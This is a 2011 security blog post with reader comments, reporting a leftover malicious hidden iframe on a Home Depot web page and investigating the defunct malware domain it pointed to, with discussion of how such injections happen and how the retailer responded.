Home Depot Website Hack

Tuesday, January 11, 2011

Contributed By:
Mark Baldwin

It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website. It all started with a simple Google search for “home depot stair spindles”.

The first unpaid result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html as shown above.

As it turns out, there is an invisible iframe in this page that links to the external site vwui.in on port 8080 as shown below.

As can be seen in the screenshot, the below code has been injected into the page:

The site vwui.com is listed as a malicious site by both Google and StopBadWare with one listing going back to July of 2009.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://vwui.in/

http://stopbadware.org/reports/90331f78dc600d02b5c6f6e77f807915

After I discovered this hack I decided to investigate the vwui.in site to try and determine what type of malware it was hosting. As it turns out, this domain no longer resolves.

[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)

StopBadWare lists the IP associated with this domain as 209.85.51.176 which according to the whois database belongs to ThePlanet.com Internet Services.

[prompt ~]$ whois 209.85.51.176
[Querying whois.arin.net]
[whois.arin.net]
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 209.85.51.0 – 209.85.51.255
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 209.85.0.0 – 209.85.127.255

Furthermore, when accessing this IP in a browser it redirects to hxxp://searchmanified.com which also appears to be serving up some type of malware.

So how did this page on Home Depot’s website get compromised? While it’s not possible for me to know for certain without doing an complete investigation, I can make an educated guess. Typically, these types of attacks use one of several attack vectors:

Compromised FTP credentials due to a weak password
Brute force compromise of server credentials
SQL injection

Back in 2009 tens of thousands of web sites were injected with hidden iframes that attempted to download malware when a visitor accessed one of the compromised sites. In many cases these attacks took advantage of SQL injection vulnerabilities to insert the hidden iframe.

They also tended to host their malware on port 8080 rather than the standard port 80.

Given the fact that the server vwui.in was first listed as a malicious site back in 2009, that the malicious site uses port 8080, and the fact that it no longer has any associated DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive attack in 2009 and only now has been discovered.

While the iframe in the Home Depot website is not currently a threat, the vulnerability that allowed it to be inserted into the page may still be present which could lead to a future compromise of this site. I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.

Originally posted at InfoSecStuff.com.

Share This! |

Views:	6754
Categories:	Webappsec->General
Tags:	Hacks malware iFrame Injection websites Home Depot Code Injection

Post Rating I Like this!

Comments:

Ben Keeley Nice find!
1) They should thank you
2) Can we have bigger images to view pls?

1294765960

Michael Menefee Ben,

We're gonna link the images back to Mark's original post where you can view more detail

1294766869

Ben Keeley Thanks - Mark this maybe of interest (Analysis Report for http://vwui.in:8080/index.php)

http://anubis.iseclab.org/?action=result&task_id=12f0d41ad8109c024f595478665346e1b&format=txt

1294767757

Steve Bush Umm, your screen shot shows that code is commented out.

1294771121

Dr Who It should have been pointed out in the article that this code was commented out and therefore not an issue.

1294771165

Rod MacPherson Scott and Steve,
That only brings up a new question.
If some web guy saw it, knew it wasn't part of the working site and thought to comment it out... Why didn't it get removed all together?

1294771442

Michael Menefee Rod, I agree...at least at one point in time it was probably NOT commented :)

1294772021

Doug Henderson Scott - the article does state that it is not currently a threat:

"While the iframe in the Home Depot website is not currently a threat"

try reading an article before replying.

@Rod - probably some lazy outsourced developer.

1294772131

Doug Henderson Isn't the web a wonderful thing.

From LinkedIn:
Scott Frost, Senior Manager of Security at The Home Depot

1294772277

Michael Menefee heh, looks like code comments are pretty common for their websites, including comments for which "defects" have been corrected:

"Added for Defect 7316" for example on line 64 of the rendered HTML on the homepage

on www.homedepot.com

1294775618

Mark Baldwin Scott, you are correct that the iframe was commented out. This was an oversight on my part and was not left out intentionally. However, my AV product did generate an alert when I went to that page so it was still being detected even though commented out. Again, I attempted to alert HD of the issue, but did not receive a reply.

1294781415

Michael Menefee Mark, just as a reference for people, which AV product and browser were you using when this alert occured?

1294781899

Mark Baldwin Firefox 3.6 and Avast Antivirus.

1294783053

Michael Menefee Mark, that's excellent. Both are free for home users.

1294788522

Michael Menefee According to research by Jeremy Kaplan from FoxNews.com (http://www.foxnews.com/scitech/2011/01/11/home-depot-website-compromised/), HomeDepot admits to having commented this code out in 2009 for "management and analysis"

Now, granted this is some secondary web server collaborating in homedepot's public web presence, but given that this injection apparently attempted to install backdoor programs on client machines, and HomeDepot.com *does* handle e-commerce transactions, shouldn't this have been reported?

Also, had they had a reasonable security assessment performed on their external web presence in the past 13+ months, this *should* have come to light as well....

1294802531

Rod MacPherson I would think that if you wanted to keep it for analysis, you'd just make a copy of the infected site to offline storage so you can recreate it as needed, but it is not out there in your public facing website waiting to become a publicity nightmare.

1294803395

Don Walrus now Rod, why would you go and "think"? :D
To your point, a comment on the foxnews.com article:

"Two sites that I manage got hit last year with the same hack (yes, it was a hack, not a "security breach"). I did what any responsible webmaster would do: saved a copy of the affected html files offline and uploaded a clean copy of the site from a backup. I then analyzed the code at my leisure; turns out it redirected to a domain in China, of all places. Go figure."

1294803834

Rod Smith Great job Mark, maybe you solved the mystery of how my computer got hacked.

The hack was discovered 7-22-2009. Was NOT running any operational AV at the time - I foolishly prided myself on being savvy enough to surf without it (my Norton had expired). That summer (2009) I often visited the HD site with the computer I'm writing this on (a Fujitsu Laptop running Vista), so maybe that's where I got infected. Windows Defender first found the Trojan - it called it "Renos.IO" in "Win32."

I then downloaded AVG Free but it failed to kick it out. Next I downloaded AVG 8.5 paid 30 day free trial and it did kick the virus out. AGV then listed these in a CSV export file: Win32/Cryptor, Trojan horse SHeur2.ARZT, Trojan horse Generic14.HDQ, Trojan horse Generic14.HCY).

I have a screen shot from my ISP showing extremely high data transfers during that period (in 10 days, 7-15-09 to 7-25-09, had 5.6 GB download, 2.6 GB upload - compare to my monthly typical of less than 1 GB down/.2 GB up). I also have screen shots of Firefox & IE history showing porno and prize sites I never visited.

Unfortunately, unknown to me AVG was set to delete old history, so because of the limited info on the screen shots I have no proof of visiting the HD site - but I know I did, frequently.

Even though AGV reports no issues, I suspect that there is still some malware on this computer. It just acts funny a lot (but...it is sick with Vista:). Any comments?

1294817433

Fred Williams I've used Avast for the past 2 years and it has worked fine for me but it has not caught everything. Whatever I get infected with, MalwareBytes usually gets rid of it.

1295042059

You Must Register or Login to Comment

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.

Most Liked

Latest Member Comments

"I thought this article discuss a very important issue of security.If we have well developed technology in one particular field then we ..."

Mobile Security Processes Could Be Applied t... Johnnie Nix on 05-21-2013

"ATM machine are for our convenience but if we are not careful they can compromise our safety. Discount theater tickets "

ATM Security (And Really Learning from the P... Johnnie Nix on 05-21-2013

"A expressive case study is used to explore causation in order to find underlying principles. Case studies may be prospective in which c..."

New Study Published on Mobile Malware... Caitlin Rachel on 05-21-2013

"In the social sciences and life sciences a case study or case report is a descriptive or descriptive analysis of a someone, group or ev..."

Case Study: A Cloud Security Assessment... Caitlin Rachel on 05-21-2013